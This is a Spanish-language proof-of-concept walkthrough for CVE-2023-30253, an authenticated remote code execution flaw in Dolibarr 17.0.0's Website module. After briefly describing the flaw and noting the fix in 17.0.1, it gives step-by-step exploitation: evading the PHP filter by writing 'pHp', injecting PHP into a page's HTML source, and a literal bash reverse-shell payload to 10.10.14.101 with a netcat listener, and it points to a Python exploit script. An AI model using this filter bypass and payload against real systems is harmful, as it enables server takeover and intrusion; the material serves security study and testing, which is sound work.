
En Dolibarr 17.0.0 con el complemento CMS Website (core) habilitado, un atacante autenticado puede obtener ejecución remota de comandos mediante inyección de código PHP, evitando las restricciones de la aplicación.
CVE-2023-30253 es una vulnerabilidad de seguridad en el software Dolibarr que permite a usuarios autenticados ejecutar código remoto mediante una técnica de manipulación de mayúsculas en datos inyectados.
Esta vulnerabilidad puede provocar la ejecución remota de código no autorizada por parte de actores malintencionados, lo que supone una grave amenaza para la seguridad e integridad de los sistemas afectados. La vulnerabilidad ha sido corregida en Dolibarr 17.0.1.
https://www.swascan.com/security-advisory-dolibarr-17-0-0/
https://github.com/Dolibarr/dolibarr
La siguiente POC muestra cómo obtener una Reverse Shell manualmente.

Después de iniciar sesión como usuario de prueba, podemos crear/modificar el sitio web.
.png)
Primero cree un sitio web y luego cree una página.
.png)

Después de crear el sitio web y la página, haga clic en el icono de binoculares; esto abrirá la página creada en una nueva pestaña.
Ahora haga clic en Editar fuente HTML.
.png)
Aquí podemos intentar agregar código php, pero hay algún tipo de filtro que nos impide escribir código php. Esto se puede evitar fácilmente cambiando el formato de la palabra php.
.png)
Después de cambiar el formato de la palabra php a pHp, podemos ver que se guarda correctamente.
.png)
Al ir a la página, podemos ver que nuestro código php insertado está funcionando.
Ahora, para obtener una reverse shell, configuremos un listener de netcat
.png)
.png)
Luego agregue nuestro código de reverse shell <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>
Ahora, al abrir el sitio web, obtenemos una reverse shell
.png)
Podemos usar el código de Python para facilitarlo

Configure un listener de netcat.

Ejecute el script y deberíamos tener una reverse shell.

Autor del script: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253